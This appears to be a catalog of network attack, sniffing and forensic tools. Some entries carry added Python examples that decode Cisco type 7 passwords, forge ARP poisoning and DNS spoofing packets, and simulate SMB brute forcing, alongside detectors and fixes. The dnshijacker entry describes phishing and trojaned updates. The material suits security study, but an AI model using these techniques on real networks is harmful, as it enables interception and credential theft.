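    """Inverse of type7_decode (IOS itself picks seeds 0-15); included to
    show that the 'encryption' is a symmetric XOR with a public key."""
    if not 0 <= seed <= 15:
        raise ValueError("IOS seeds are 0-15")
    body = bytes(c ^ KEY[(seed + i) % len(KEY)] for i, c in enumerate(plaintext.encode()))
    return f"{seed:02d}{body.hex().upper()}"


# Constructed config fragment (not from any real device) carrying two
# type 7 strings.  The 'enable secret 5' line is a salted MD5 hash and is
# NOT reversible this way, which is why it is the recommended form.
SAMPLE_CONFIG = """\
hostname edge-rtr
enable secret 5 $1$xyz$notreversiblebythisscript
username ops password 7 0822455D0A16
line vty 0 4
 password 7 071C244F5C0C0D
"""

TYPE7_RE = re.compile(r"\b(?:password|key)\s+7\s+([0-9A-Fa-f]{4,})")


def recover_from_config(text: str):
    """Return (hex, plaintext) for every type 7 string found in a config."""
    return [(m.group(1), type7_decode(m.group(1))) for m in TYPE7_RE.finditer(text)]


if __name__ == "__main__":
    for hexs, plain in recover_from_config(SAMPLE_CONFIG):
        print(f"{hexs} -> {plain}")
```

The only real fix is not to rely on type 7 at all: `enable secret` (type 5, salted MD5) and the type 8/9 hashes on newer IOS are the one-way forms; `service password-encryption` only hides passwords from shoulder-surfing, which is exactly what the decoder above shows.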
        
Tools/lufs 0.9.7
Package Directory: /opt/Operator_Extras/Tools/lufs


LUFS enables you to mount into your file hierarchy a remote computer's
file system, which is accessible by various means (ftp, ssh, etc.). Then
access to the remote files is completely network transparent. In
other words, you'll be able to read/modify remote files as if they were local,
and watch movies/listen to MP3s from FTP/SSH/Gnutella servers without copying them
locally. Sheer magic.

        
Tools/rwtb 2.0
Package Directory: /opt/Operator_Extras/Tools/rwtb


The Reverse-WWW-Tunnel-Backdoor is a proof-of-concept Perl program for the
paper "Placing Backdoors through Firewalls". It allows communicating with
a shell through firewalls and proxy servers by imitating web traffic. The
master/slave relation is reversed; therefore no listening ports are used
on the target machine.


        
Tools/ffp-008 0.0.8
Package Directory: /opt/Operator_Extras/Tools/ffp-008


Fuzzy Fingerprinting - Attacking vulnerabilities in the Human Brain
Fuzzy fingerprinting (ffp) is a technique that extends common man-in-the-middle
attacks by generating fingerprints that closely look like the target's public 
key fingerprint.
        
Tools/sbd-133 1.33
Package Directory: /opt/Operator_Extras/Tools/sbd-133


sbd is a Netcat-clone, designed to be portable and offer strong encryption. It
runs on Unix-like operating systems and on Microsoft Win32. sbd features
AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), arbitrary command
execution (-e option), choosing source port, continuous reconnection with
delay, and some other nice features. sbd supports TCP/IP communication only.

        
Tools/arpmim-02 0.2
Package Directory: /opt/Operator_Extras/Tools/arpmim-02


ARP MITM attack tool. (c) xdr 2000
rewritten & enhanced by skyper 2001
Idea from scut's arptool - Requires Libnet 1.00.

Features:
- classic mim: redirect data from 1 host to 1 host via your host.
- redirect data from n hosts to 1 host via your host with specific ip:mac.
- redirect data from N/all hosts to 1 host via your host with just 
  1 packet every 10 seconds. We use broadcast mac with unicast 
  arp-information in the packet.
- redirect communication from n hosts to n hosts via your host
  with just n packets (and _not_ n*n as most (all?) existing arpmim tools).

Hints:
- don't forget to enable forwarding:
  "echo 1 >/proc/sys/net/ipv4/ip_forward"
- don't use NAT/connection tracking while hijacking.
- configure your firewall (input, output, forward rules)
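As an added example (not arpmim's code, and with made-up addresses), here is the pair of ARP replies a classic 1-to-1 MITM sends, a parser for them, and the flip-flop check a monitor uses to catch it; it also covers the broadcast-frame-with-unicast-ARP trick the feature list mentions.

```python
import struct

# Added example (not arpmim's code): build the ARP replies a 1-to-1 MITM
# sends, parse them back, and run the check a monitor would use to spot it.
ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = b"\xff" * 6
ZERO_MAC = b"\x00" * 6


def mac(s): return bytes.fromhex(s.replace(":", ""))
def ip(s): return bytes(int(o) for o in s.split("."))
def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)


def build_arp(op, sha, spa, tha, tpa, dst_mac=None):
    """Ethernet II frame carrying an RFC 826 ARP packet.  dst_mac defaults
    to tha; passing BROADCAST reproduces arpmim's 'N/all hosts' mode, where
    one broadcast frame carries unicast ARP information."""
    dst = tha if dst_mac is None else dst_mac
    eth = dst + sha + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + sha + spa + tha + tpa
    return eth + arp


def parse_arp(frame):
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    a = frame[22:42]
    return {"dst": frame[0:6], "src": frame[6:12], "op": op,
            "sha": a[0:6], "spa": a[6:10], "tha": a[10:16], "tpa": a[16:20]}


def poison_pair(attacker_mac, a_mac, a_ip, b_mac, b_ip):
    """Classic MITM between A and B: tell A that B's IP lives at the
    attacker's MAC, and tell B the same about A's IP.  With ip_forward=1 on
    the attacker host (and no NAT, as the hints above say) A<->B traffic
    transits it; the two replies must be resent before the caches expire."""
    return [build_arp(ARP_REPLY, attacker_mac, b_ip, a_mac, a_ip),
            build_arp(ARP_REPLY, attacker_mac, a_ip, b_mac, b_ip)]


def detect_poisoning(frames):
    """arpwatch-style check over a capture: learn IP->MAC from ARP senders
    and alert on a flip-flop, or on a reply sent to the broadcast address,
    which normal stacks do not do.  Expect noise from DHCP churn and
    VRRP/HSRP failover; in practice those get whitelisted."""
    seen, alerts = {}, []
    for f in frames:
        p = parse_arp(f)
        if p is None or p["op"] not in (ARP_REQUEST, ARP_REPLY):
            continue
        if p["op"] == ARP_REPLY and p["dst"] == BROADCAST:
            alerts.append(f"broadcast ARP reply from {mac_str(p['sha'])} for {ip_str(p['spa'])}")
        old = seen.get(p["spa"])
        if old is not None and old != p["sha"]:
            alerts.append(f"flip-flop: {ip_str(p['spa'])} moved {mac_str(old)} -> {mac_str(p['sha'])}")
        seen[p["spa"]] = p["sha"]
    return alerts


# Constructed capture: A resolves the gateway B normally, then attacker C
# poisons both.  All MACs and IPs are made up for the example.
A_MAC, A_IP = mac("aa:aa:aa:00:00:05"), ip("10.0.0.5")
B_MAC, B_IP = mac("bb:bb:bb:00:00:01"), ip("10.0.0.1")
C_MAC = mac("cc:cc:cc:00:00:99")
CAPTURE = [
    build_arp(ARP_REQUEST, A_MAC, A_IP, ZERO_MAC, B_IP, dst_mac=BROADCAST),
    build_arp(ARP_REPLY, B_MAC, B_IP, A_MAC, A_IP),
] + poison_pair(C_MAC, A_MAC, A_IP, B_MAC, B_IP)

if __name__ == "__main__":
    for alert in detect_poisoning(CAPTURE):
        print(alert)
```

Run it to print the two alerts the poisoning produces. On the attacker side the hints above still apply: forwarding must be on and NAT/conntrack must not rewrite the relayed traffic, or the victims see broken connections instead of a transparent relay. On the defence side, static ARP entries or DHCP snooping with dynamic ARP inspection make these replies ineffective.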

        
Tools/autopsy-203 2.03
Package Directory: /opt/Operator_Extras/Tools/autopsy-203


The Autopsy Forensic Browser is a graphical interface to utilities
found in The Sleuth Kit, which are open source tools for the forensic
analysis of Microsoft and UNIX file systems.  It allows the allocated
and deleted files, directories, data units, and meta data of file
system images to be analyzed in a read-only environment.  Images
can be searched for strings and regular expressions to recover
deleted material.  It also allows one to create a detailed time
line of the Modified, Access, and Changed times of files.  Hash
databases are used to identify if a file is known to be good or
bad.  Files can also be organized based on their file type - instead
of just viewing them by directory listings.

Autopsy is HTML-based and uses a client-server model.  The Autopsy
server runs on many UNIX systems and the client can be any platform
with an HTML browser.  This enables one to create a flexible
environment with a central Autopsy server and several remote clients.
For incident response scenarios, a CD with The Sleuth Kit and
Autopsy can be created to allow the responder read-only remote
access to a suspect system from an HTML-browser on a trusted system.

Autopsy will not modify the original images and the integrity of the
images can be verified in Autopsy using MD5 values.

        
Tools/sleuthkit-172 1.72
Package Directory: /opt/Operator_Extras/Tools/sleuthkit-172


The Sleuth Kit is an open source forensic toolkit for analyzing
Microsoft and UNIX file systems.  The Sleuth Kit enables investigators
to identify and recover evidence from images acquired during incident
response or from live systems.  The Sleuth Kit is open source,
which allows investigators to verify the actions of the tool or
customize it to specific needs.

The Sleuth Kit uses code from the file system analysis tools of
The Coroner's Toolkit (TCT) by Wietse Venema and Dan Farmer.  The
TCT code was modified for platform independence.  In addition,
support was added for the NTFS (see docs/ntfs.README) and FAT (see
docs/fat.README) file systems.  Refer to the CHANGES.FROM.TCT file
for specific differences.  Previously, The Sleuth Kit was called
The @stake Sleuth Kit (TASK).  The Sleuth Kit is now independent
of any commercial or academic organizations.

It is highly recommended that these command line tools be used
with the 1.70 version of the Autopsy Forensic Browser.  Autopsy,
(http://www.sleuthkit.org/autopsy), is a graphical interface to
the tools of The Sleuth Kit and automates many of the procedures
and provides features such as image searching and MD5 image integrity
checks.

        
Tools/login_hacker-11 1.1
Package Directory: /opt/Operator_Extras/Tools/login_hacker-11


login_hacker is a tool used to try to brute force guess login/passwords against
modem carriers. This program is flexible and portable because it uses the scripting
language of minicom.


WHAT DO YOU NEED
----------------
An installed UNIX operating system.
Minicom installed (comes with any Linux distribution).
This package.
A modem connected to your system and /dev/modem pointing to the right
serial port.
A phone number with remote modem to answer and presenting a login/password
prompt ;-)

NEW: with v1.1 I added my check_ppp script which connects to the number and
then starts pppd to check for ppp dial-ins which might be passwordless.


        
Tools/anger-133 1.33
Package Directory: /opt/Operator_Extras/Tools/anger-133


Anger is a PPTP sniffer and attack tool. It sniffs PPTP's MSCHAP
challenge/response and outputs it in a format suitable for input
into the L0phtcrack password cracking program.

        
Tools/domtools 1.6.0
Package Directory: /opt/Operator_Extras/Tools/domtools


This package allows you to traverse DNS domain hierarchies,
list all hosts (or subdomains) within a given domain, convert host name to
IP address and vice-versa, convert a normal IP address to the "in-addr.arpa."
format and vice-versa, and more.   These commands can be used manually, or
included as building blocks for higher level DNS tools.  They generate output
that is easily computer parsable.

        
Tools/rda-021c 0.2.1c
Package Directory: /opt/Operator_Extras/Tools/rda-021c


rda is a command line Linux tool to remotely acquire data (like disk cloning 
or disk/partition imaging) and verify the transfer using md5 and/or crc32 
checksums. The program is both the server and the client.

In short, the features are:

 - Transfers data via an ethernet or other network interface
 - MD5 and/or CRC32 checksums
 - Option to skip read errors - like bad blocks, dirty CD's, etc.
	Bad blocks are replaced with zeros and their positions are logged.
	Can do that for big disks also ( exceeds 8000000 TB on 32-bit machines)
 - Option to span output to multiple files
 - Can write output to a disk or partition 
	for disk duplication, etc.


        
Tools/mdcrack-12 1.2
Package Directory: /opt/Operator_Extras/Tools/mdcrack-12


MDcrack is designed as a proof of concept to show how weak the MD*-hashed
passwords widely used in many authentication schemes are.

        
Tools/RandomNet N/A
Package Directory: /opt/Operator_Extras/Tools/RandomNet


RandomNet is a tool that builds random, realistic honeyd configuration files.  
It is designed for users who want to develop a realistic network using the 
honeyd tool, but do not want to spend time building a complex configuration 
file by hand.  It runs off the command line using a specific configuration 
file for fast, repeated use.  It also provides a GUI for developing the 
RandomNet configuration file.

RandomNet was written in Java to be compatible on many different operating 
systems.  For installation instructions and documentation, please see the 
provided pdf file.

        
Tools/honeyd-scripts N/A
Package Directory: /opt/Operator_Extras/Tools/honeyd-scripts


honeynet.br
   cmdexe.pl

   cmdexe.pl is a Honeyd  module that emulates a DOS command prompt. It is 
   useful to emulate a simple Windows "shell" backdoor, as used by many 
   worms nowadays.

   honeydsum.pl

   honeydsum.pl is a tool written in Perl designed to generate a text summary 
   from Honeyd logs. The summaries may be produced using different parameters 
   as filters, such as ports, protocols, IP addresses or networks. It shows 
   the top source and port access and the number of connections per hour, and 
   supports input from multiple log files. The script can also correlate 
   events from several honeypots. 

   kuang2.pl

   kuang2.pl is a Honeyd module that emulates the backdoor installed by the 
   Kuang2 virus. It saves uploaded files and also logs attempts to use Kuang2 
   backdoor commands, like file download, execution, deletion, etc. 

   mydoom.pl

   mydoom.pl is a simple Perl script, that works with Honeyd, to emulate the 
   backdoor installed by the Mydoom virus. It saves uploaded files and also 
   logs attempts to use the Mydoom backdoor proxy capability (socks4). 


Daniel Cid
   telnet-emul 	

   Telnet Simulation for Linux, Solaris and Windows

Eric Thomas
   Honeyd Regression Testing
   
   Scripts to check Honeyd personalities


        
Tools/netwox_524 5.24
Package Directory: /opt/Operator_Extras/Tools/netwox_524


Netwox is a utility that can be thought of as a one stop shop network toolbox. 
It includes a graphical front-end called Netwag. This kit comes with 150 tools 
that can be used to perform a multitude of tasks that are very useful to any 
administrator. It supports various protocols (DNS, FTP, HTTP, NNTP, SMTP, 
SNMP) and performs low level functions like sniffing, spoofing traffic, and 
playing client/server roles. Both Windows and Unix versions are included.
        
Tools/tds-002 0.02beta
Package Directory: /opt/Operator_Extras/Tools/tds-002


NOTE: TDS was formerly called SCANDNS.

TDS is a script written in perl for unix which utilizes data from dns
information, essentially scanning the entire internet by querying the
root-servers, and then the individual nameservers for domains.

        
Tools/brian N/A
Package Directory: /opt/Operator_Extras/Tools/brian


  brian - "He's not the Messiah, he's a very naughty man!"
 
  Based on the ideas of ARP poisoning present in Ettercap, this program
  is a simple tool to effectively convert a switched network (or a part of
  it) into a shared network so that sniffing can take place.

        
Tools/sara-54 5.4.0
Package Directory: /opt/Operator_Extras/Tools/sara-54


SARA (Security Auditor's Research Assistant), a derivative of the
Security Administrator Tool for Analyzing Networks (SATAN), remotely probes
systems via the network and stores its findings in a database. The
results can be viewed with any Level 2 HTML browser that supports the
http protocol (e.g. Mosaic, Netscape, etc.)

        
Tools/lsrtunnel-021 0.2.1
Package Directory: /opt/Operator_Extras/Tools/lsrtunnel-021


lsrtunnel spoofs connections using source routed packets. 
        
Tools/httptunnel-305 3.0.5
Package Directory: /opt/Operator_Extras/Tools/httptunnel-305


httptunnel creates a bidirectional virtual data path tunnelled in HTTP
requests.  The requests can be sent via an HTTP proxy if so desired.

This can be useful for users behind restrictive firewalls.  If WWW
access is allowed through an HTTP proxy, it's possible to use
httptunnel and, say, telnet or PPP to connect to a computer outside
the firewall.

        
Tools/smbbf N/A
Package Directory: /opt/Operator_Extras/Tools/smbbf


The SMB Auditing Tool by patrik.karlsson@ixsecurity.com
--------------------------------------------------------

This is a suite of SMB and Netbios programs.
The programs are:

smbdumpusers     - Used to retrieve users from a Windows NT/2000 box.
		   If verbose is used in combination with the Sid to User
		   mode, the RIDs of all users will be displayed as well.

smbgetserverinfo - Returns some information from the ipaddress supplied.

smbbf 		 - An SMB bruteforcer which tries approx. 1200 logins/sec
		   on Windows 2000 because of the timeout bug. On NT4 it's
		   very much slower, making a couple of logins a sec.

		   If you run smbbf with only the ip specified, it will
		   attempt to retrieve all users, and try to login with a
		   blank password, followed by the username in lowercase
		   as password and finally with the password "password".

		   If smbbf successfully logs in to an account, it will
		   continue with the next account.

		   If you feel that you want to take some precautions to
		   not disable every account on the server, try the -g flag.
		   After it locks out the first account, it stops at tries-1,
		   on the next account, and will not process the rest of the
		   password file. This is done on every account following the
		   locked out one. 

		   Bear in mind that if e.g. the lockout is set to 3 tries and
		   some user has done 2 "bad logins", it will seem to smbbf
		   that the lockout is set to 1. Therefore it's recommended
		   to keep the password list smaller than the lockout number,
		   and not to use the -g flag if not absolutely necessary.

		   The administrator account doesn't seem to return the error
		   "account locked out", so the next available account will
		   be the one that will be monitored for lockout attempts.
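The lockout logic above is easy to get wrong, so here is an added simulation (not smbbf's code; the target is a constructed stand-in and speaks no SMB) of the default guesses, the -g behaviour, and the two caveats: pre-existing bad logins shrinking the apparent threshold, and an account that locks silently. Account names, passwords and the wordlist are made up.

```python
# Added example, not smbbf's code: a simulation of its lockout-aware loop,
# including the -g flag and the failure modes the README warns about.

DEFAULT_GUESSES = ["", "{user}", "password"]   # what smbbf tries when given only an IP


class MockSmbTarget:
    """Constructed stand-in for a Windows host with an account-lockout
    threshold.  login() returns 'ok', 'bad' or 'locked'.  Accounts in
    silent_lockout (the README says Administrator behaves this way) are
    locked just the same but keep answering 'bad', so the caller cannot tell."""

    def __init__(self, passwords, threshold, prior_bad=None, silent_lockout=()):
        self.passwords = passwords          # user -> real password
        self.threshold = threshold
        self.bad = dict(prior_bad or {})    # bad-login counters, possibly pre-filled
        self.locked = set()
        self.silent = set(silent_lockout)

    def _status(self, user):
        return "bad" if user in self.silent else "locked"

    def login(self, user, password):
        if user in self.locked:
            return self._status(user)
        if self.passwords.get(user) == password:
            return "ok"
        self.bad[user] = self.bad.get(user, 0) + 1
        if self.bad[user] >= self.threshold:
            self.locked.add(user)
            return self._status(user)
        return "bad"


def brute(target, users, wordlist=None, guard=False):
    """smbbf-style loop.  guard=True mimics -g: once an account reports
    lockout on try N, every later account gets at most N-1 tries.
    Returns (credentials found, inferred limit, accounts locked out)."""
    found, limit = {}, None
    for user in users:
        words = [user.lower() if w == "{user}" else w for w in (wordlist or DEFAULT_GUESSES)]
        for i, pw in enumerate(words, 1):
            if limit is not None and i > limit:
                break
            result = target.login(user, pw)
            if result == "ok":
                found[user] = pw
                break                    # smbbf moves on after a hit
            if result == "locked":
                if guard and limit is None:
                    limit = i - 1        # -g: assume the threshold is i
                break
    return found, limit, sorted(target.locked)


# Constructed data for the scenarios.
WORDS = ["", "password", "Welcome1", "Summer2005", "letmein"]
ACCOUNTS = {"alice": "Winter2005", "bob": "password", "carol": "letmein"}

if __name__ == "__main__":
    for guard in (False, True):
        t = MockSmbTarget(ACCOUNTS, threshold=3)
        print("guard" if guard else "no guard", brute(t, list(ACCOUNTS), WORDS, guard=guard))
```

Running the scenarios shows the README's advice in numbers: a wordlist shorter than the threshold never locks anyone out; -g limits the damage to one account but starves every later account the moment some other user has already burned attempts; and a silently locking account both gets locked and fails to act as the canary, so the next account does instead.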

        
Tools/resettcp-12 1.2
Package Directory: /opt/Operator_Extras/Tools/resettcp-12


by Paul Watson

reset-tcp
   Proof of concept to reset tcp connections by Slipping in the Window
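An added example (not Paul Watson's code, nor Kreset.pl from the misc directory above) of the arithmetic both rely on: before RFC 5961, a RST was accepted when its sequence number fell anywhere inside the receive window, so an attacker who knows the 4-tuple needs about 2^32/window guesses rather than 2^32. The block also shows the RFC 5961 rule that removes the shortcut. The connection values used are arbitrary.

```python
# Added example (not the resettcp or Kreset.pl code): the acceptance test a
# blind RST abuses, the number of guesses that buys, and the RFC 5961 fix.
MOD = 1 << 32


def in_window(rcv_nxt, rcv_wnd, seq):
    """Pre-RFC 5961 RST acceptance: RCV.NXT <= SEG.SEQ < RCV.NXT + RCV.WND,
    evaluated modulo 2^32 so a window that wraps past 2^32-1 still works."""
    return (seq - rcv_nxt) % MOD < rcv_wnd


def rst_accepted(rcv_nxt, rcv_wnd, seq, challenge_ack=False):
    """With RFC 5961 section 3.2 only SEQ == RCV.NXT resets the connection;
    any other in-window SEQ gets a challenge ACK instead."""
    if challenge_ack:
        return seq == rcv_nxt
    return in_window(rcv_nxt, rcv_wnd, seq)


def rst_attempts(rcv_wnd, challenge_ack=False):
    """Blind attacker who knows the 4-tuple but not SEQ: stepping SEQ by the
    window size guarantees that one candidate lands inside it."""
    if challenge_ack:
        return MOD                  # back to guessing the exact 32-bit value
    return -(-MOD // rcv_wnd)       # ceil(2^32 / window)


def candidates(rcv_wnd, start=0):
    """The SEQ values a blind attacker sends, in order."""
    for k in range(rst_attempts(rcv_wnd)):
        yield (start + k * rcv_wnd) % MOD


def first_hit(rcv_nxt, rcv_wnd, start=0):
    """(attempt index, SEQ) of the first blind RST the victim would accept."""
    for k, seq in enumerate(candidates(rcv_wnd, start)):
        if in_window(rcv_nxt, rcv_wnd, seq):
            return k, seq
    return None


if __name__ == "__main__":
    for wnd in (16384, 65535):
        print(f"window {wnd}: {rst_attempts(wnd)} blind RSTs worst case, "
              f"first hit on a connection at RCV.NXT=123456789: {first_hit(123456789, wnd)}")
    print("with RFC 5961 challenge ACKs:", rst_attempts(65535, challenge_ack=True))
```

Long-lived sessions with guessable endpoints (BGP peerings on port 179) were the motivating target, and window scaling makes the arithmetic worse for the defender. RFC 5961 challenge ACKs, and TCP MD5/TCP-AO on the BGP session itself, are the fixes.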

        
Tools/4g8-09b 0.9b
Package Directory: /opt/Operator_Extras/Tools/4g8-09b


Packet Sniffer Over Switched Network

4G8 (Forge Gate) allows you to capture traffic from a third party in a 
switched environment at the expense of a slight increase in latency to 
that third party host. Utilizing ARP cache poisoning, packet capture 
and packet reconstruction techniques, 4G8 works with nearly all TCP, ICMP 
and UDP IPv4 traffic flows.

        
Tools/ipaudit-095 0.95
Package Directory: /opt/Operator_Extras/Tools/ipaudit-095


IPAUDIT listens to a network device in promiscuous mode, and records
every 'connection', i.e. each conversation between two ip addresses.  A unique
connection is determined by the ip addresses of the two machines, the
protocol used between them and the port numbers (if they are communicating
via udp or tcp).

IPAUDIT can be used to monitor network activity for a variety of purposes.
It has proved useful for intrusion detection, for monitoring bandwidth
consumption and for spotting denial of service attacks.

        
Tools/dnshijacker-11 1.1
Package Directory: /opt/Operator_Extras/Tools/dnshijacker-11



Aside from the tremendous comical value of redirecting your friends to gay porno
sites there are a few other (possibly legitimate) uses to dnshijacker. Firstly,
sites can be filtered based on keywords in domain names. Of course this can
easily be bypassed through the usage of a proxy. The second, and in my opinion,
more useful use is to hijack the queries for all the popular ad servers (such as
doubleclick.net). That way not only are you alleviating yourself from the
ghastly sight of advertisements, but you've also upped your level of privacy a
notch or two.

Along with the prankster, the blackhat will probably find the most uses for
dnshijacker. The possibilities are endless. One could easily mirror a site
(hotmail, etrade, online banking, etc) and redirect requests to that mirror for
login/password collection. Another target for attack is the auto-update features
that most windows applications use. Next time Winamp or AOL Instant Messenger
check for an update, the request can be redirected to yourself, an "update
available" answer can then be spoofed, and a trojan-wrapped executable sent to
the victim.
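As an added example (not dnshijacker's code; the names and the spoofed address are made up), here is the whole exchange: a client query, the keyword filter, the forged A-record reply built from the sniffed query, and the resolver-side check that decides whether the forgery wins.

```python
import struct

# Added example (not dnshijacker's code): the forged reply a DNS hijacker
# sends for a query it chooses to answer, the parser a resolver runs on it,
# and the match check that decides whether the forgery is accepted.
QTYPE_A, QTYPE_MX, QCLASS_IN = 1, 15, 1


def encode_name(name):
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode()
    return out + b"\x00"


def decode_name(msg, off):
    """Return (name, offset after it); follows an RFC 1035 compression pointer."""
    labels = []
    while True:
        ln = msg[off]
        if ln == 0:
            return ".".join(labels), off + 1
        if ln & 0xC0 == 0xC0:
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(msg, ptr)
            return ".".join(labels + [tail]), off + 2
        labels.append(msg[off + 1:off + 1 + ln].decode())
        off += 1 + ln


def build_query(txid, name, qtype=QTYPE_A):
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD=1, one question
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(msg):
    txid, flags, qdcount = struct.unpack("!HHH", msg[:6])
    if flags & 0x8000 or qdcount != 1:        # QR set means it is a reply
        return None
    name, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": msg[12:off + 4]}


def should_hijack(name, keywords):
    """dnshijacker's filter mode: substring match on the queried name."""
    return any(k in name.lower() for k in keywords)


def forge_answer(query, spoofed_ip, ttl=300):
    """Reply the victim's resolver accepts if it arrives before the real one:
    same TXID, same question, QR|RD|RA set, one A record whose name is a
    compression pointer (0xC00C) back to the question at offset 12."""
    q = parse_query(query)
    if q is None or q["qtype"] != QTYPE_A:
        return None
    header = struct.pack("!HHHHHH", q["id"], 0x8180, 1, 1, 0, 0)
    rdata = bytes(int(o) for o in spoofed_ip.split("."))
    rr = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + q["question"] + rr


def parse_answer(msg):
    txid, flags, qd, an = struct.unpack("!HHHH", msg[:8])
    name, off = decode_name(msg, 12)
    off += 4                                   # skip QTYPE/QCLASS of the question
    answers = []
    for _ in range(an):
        rname, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((rname, ".".join(str(b) for b in rdata), ttl))
    return {"id": txid, "flags": flags, "name": name, "answers": answers}


def resolver_accepts(query, reply):
    """The pre-DNSSEC check: TXID and question must match and QR must be set.
    A sniffer already has both values, so the forgery passes trivially."""
    q, a = parse_query(query), parse_answer(reply)
    return q is not None and a["id"] == q["id"] and a["name"] == q["name"] and bool(a["flags"] & 0x8000)


if __name__ == "__main__":
    q = build_query(0x1234, "ad.doubleclick.net")
    if should_hijack(parse_query(q)["name"], ["doubleclick"]):
        print(parse_answer(forge_answer(q, "127.0.0.1")))
```

The forgery works because the reply only has to carry a matching 16-bit ID and question and arrive first. Source-port and 0x20 case randomisation only hinder off-path guessers; an on-path sniffer copies them from the query, so against this tool only DNSSEC validation (or TLS with certificate checking in the application above it, which is also what closes the auto-update variant described above) actually helps.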

        
Tools/burpspider_v11 1.1
Package Directory: /opt/Operator_Extras/Tools/burpspider_v11


Burp spider is a tool for enumerating web-enabled applications. It uses 
various intelligent techniques to generate a comprehensive inventory of 
an application's content and functionality.

Burp spider enables the user to obtain a detailed understanding of how a web 
application works, avoiding the time-consuming and unreliable task of manually 
following links, submitting forms and scouring HTML source code. Potentially 
vulnerable application functions can be quickly identified, allowing the user 
to check for specific vulnerabilities such as SQL injection and directory 
traversal.
        
Tools/ADMsmb_02 0.2
Package Directory: /opt/Operator_Extras/Tools/ADMsmb_02


ADM smb is a security scanner for Samba 
/* based on the src of the smbclient  from the samba team */
ADMsmb will perform a complete audit of samba for you on a host you
provide.

1: Get the netbios name of the machine
2: Give you information about this machine 
  {
    share list;
    workgroup;
    domain;
    os;
   }

3: try to access any shares exported 
4: perform a session brute force  
5: perform brute force on a directory specified.

        
Tools/dcom_scanner N/A
Package Directory: /opt/Operator_Extras/Tools/dcom_scanner


dcom-isvuln
	dcom/rpc scanner by: kid and farp

dcom_scanner v1.02
	dcom/rpc scanner by: kid and farp
	Modified by: swoop@ussysadmin.com to scan a host range
        
Tools/ike-scan-17 1.7
Package Directory: /opt/Operator_Extras/Tools/ike-scan-17


ike-scan discovers IKE hosts and can also fingerprint them using the
retransmission backoff pattern.

ike-scan does two things:

a) Discovery: Determine which hosts are running IKE.
   This is done by displaying those hosts which respond to the IKE requests
   sent by ike-scan.

b) Fingerprinting: Determine which IKE implementation the hosts are using.
   This is done by recording the times of the IKE response packets from the
   target hosts and comparing the observed retransmission backoff pattern
   against known patterns.

The retransmission backoff fingerprinting concept is discussed in more
detail in the UDP backoff fingerprinting paper which should be included
in the ike-scan kit as udp-backoff-fingerprinting-paper.txt.

The program sends IKE main mode requests to the specified hosts and displays
any responses that are received.  It handles retry and retransmission with
backoff to cope with packet loss.  It also limits the amount of bandwidth
used by the outbound IKE packets.

IKE is the Internet Key Exchange protocol which is the key exchange and
authentication mechanism used by IPsec.  Just about all modern VPN systems
implement IPsec, and the vast majority of IPsec VPNs use IKE for key exchange.
Main mode is one of the modes defined for phase-1 of the IKE exchange (the
other defined mode is aggressive mode).  RFC 2409 section 5 specifies that
main mode must be implemented, therefore all IKE implementations can
be expected to support main mode.

        
Tools/seringe 0.2
Package Directory: /opt/Operator_Extras/Tools/seringe


seringe v0.2: arp injector and redirector
Copyright 2003,2004 - Michael Hendrickx (michael@scanit.be)
 
intercepts arp requests, sends "own" mac address (or -m arg). 
Without libnet, libpcap or any other libraries.. made during
a security audit when i had no access to these libraries.
   
todo: accept ip addr arguments with -m and -f 

        
Tools/passifist 1.0.8
Package Directory: /opt/Operator_Extras/Tools/passifist


Passifist is a tool for passive network discovery. It could be used for a 
number of different things, but was mainly written to discover hosts 
without actively probing a network. The tool analyzes broadcast traffic 
and has a plugin architecture through which it dissects and reports 
services found. Initial version holds support for the following protocols 
and plugins: CDP, CIM, HSRP, IPX, NETOP, SMB, TFTP.
        
Tools/air-125 1.2.5
Package Directory: /opt/Operator_Extras/Tools/air-125


Automated Image and Restore

AIR is a graphical front-end for dd and dcfldd designed to make the task
of creating forensic images of magnetic media easier for investigators and
incident response personnel.  AIR is written in Perl/Tk and (at this time)
only supports Linux.  Features include:

- choice of using either dd or dcfldd
- image verification between source and copy via MD5 or SHA1
- image compression/decompression via gzip/bzip2
- image over a TCP/IP network
- maintains a detailed session log
- supports SCSI tape drives
- wiping (zeroing) drives or partitions
- splitting images into user-defined segments

        
Tools/rainbowcrack-12 1.2
Package Directory: /opt/Operator_Extras/Tools/rainbowcrack-12


In short, the RainbowCrack tool is a hash cracker. While a traditional brute
force cracker tries all possible plaintexts one by one at cracking time,
RainbowCrack works in another way. It precomputes hash chains covering the
plaintext space in advance and stores their endpoints in a file, the so-called
"rainbow table". It may take a long time to precompute the tables, but once
the one-time precomputation is finished, you will always be able to crack
the ciphertext covered by the rainbow tables in seconds.

Patched:
This patch contains the following additional hash algorithms: CiscoPIX, MySQL 
v.3.23, MySQL SHA1, NTLM, MD2, MD4 and RIPEMD160.
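To make the tradeoff concrete, here is an added toy implementation (not RainbowCrack's code) of the idea: MD5 over a 4-digit PIN keyspace (an assumption chosen for size), chains of length 40 with one reduction function per column, a table that stores only chain endpoints, and a lookup that walks the columns back. A counter on MD5 calls makes the cost comparison against brute force visible.

```python
import hashlib

# Added example, not RainbowCrack's code: a toy rainbow table for MD5 over
# 4-digit PINs (keyspace assumed for size).  STATS counts MD5 calls so the
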